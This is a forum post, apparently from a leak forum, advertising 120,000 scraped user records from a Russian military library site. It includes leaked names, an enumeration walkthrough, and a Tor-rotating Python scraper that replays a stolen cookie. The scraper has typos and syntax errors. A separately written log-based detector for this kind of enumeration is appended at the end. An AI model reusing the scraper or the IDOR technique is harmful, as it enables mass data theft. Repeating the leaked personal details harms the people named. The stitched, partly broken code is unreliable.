04-09-25, 11:22 AM
(10-06-23, 02:00 AM) PocExploiter Wrote: Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!
Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.
Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}
Vulnerabilities:
- Bypass File Upload Format
- Disclosure Personal Information
- User activity monitoring
Tutorial Exploitation: Notified: for this an access is required which later a pentesting could be done.
Parameters: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of Burp Suite, Intruder option.
Code:{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}
{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}
Now Exposed Admin:
https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military
CODE EXPLOIT:
PHP Code:#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
'http': 'socks5://127.0.0.1:9050',
'https': 'socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
for i in range(100642):
headers = { 'User-Agent': UserAgent(browsers=['edge', 'firefox']).random }
time.sleep(1)
with Controller.from_port(port = 9051) as c:
c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
c.signal(Signal.NEWNYM)
url = "'https://biblio2.mil.ru/api/reader/1" + str(i) + "'"
comando = "curl --proxy socks5://127.0.0.1:9050 " + url + " --cokkie='" + sys.argv[1] + "'")
print(comando)
print("\nIndice: " + str(i) + "\n")
os.system(comando)
- The vulnerability allows viewing details of system users.
- Other identical vulnerabilities have been verified
- The User API Actions with administrator privileges were also identified.
We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc.
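
The posted script changes its Tor circuit and User-Agent on every request but reuses one session cookie, so per-IP rate limits would not see the walk over /api/reader/(ID). The following is an added detection example, not part of the original post, that counts distinct reader IDs per session instead. The log format, thresholds, function names and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumed log format (constructed, not from the page):
#   <epoch-seconds> <source-ip> <session-token-hash> <request-path>
READER_PATH = re.compile(r"^/api/reader/(\d+)$")

def find_enumeration(lines, window=300, max_distinct=20):
    """Return {session: (distinct_ids, distinct_ips)} for sessions that
    fetched more than max_distinct reader records within `window` seconds."""
    events = defaultdict(list)          # session -> [(ts, ip, reader_id)]
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue                    # skip malformed lines
        ts, ip, session, path = parts
        m = READER_PATH.match(path)
        if m and ts.isdigit():
            events[session].append((int(ts), ip, int(m.group(1))))

    flagged = {}
    for session, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # advance the left edge until the span covers <= window seconds
            while evs[end][0] - evs[start][0] > window:
                start += 1
            span = evs[start:end + 1]
            ids = {e[2] for e in span}
            if len(ids) > max_distinct:
                ips = {e[1] for e in span}
                best = flagged.get(session, (0, 0))
                flagged[session] = max(best, (len(ids), len(ips)))
    return flagged

def sample_log():
    """Constructed sample: one session walking ids from rotating source IPs,
    one ordinary session re-reading a single record."""
    lines = [f"{1000 + i} 198.51.100.{i % 250 + 1} sessA /api/reader/{i}"
             for i in range(60)]
    lines += [f"{1000 + 40 * i} 203.0.113.7 sessB /api/reader/4242"
              for i in range(10)]
    lines.append("garbage line")
    return lines

if __name__ == "__main__":
    for sess, (n_ids, n_ips) in find_enumeration(sample_log()).items():
        print(f"{sess}: {n_ids} distinct reader ids from {n_ips} source IPs")
```

A high distinct-IP count for a single session is itself a strong signal. Detection of this kind complements, and does not replace, an object-level authorization check on the endpoint.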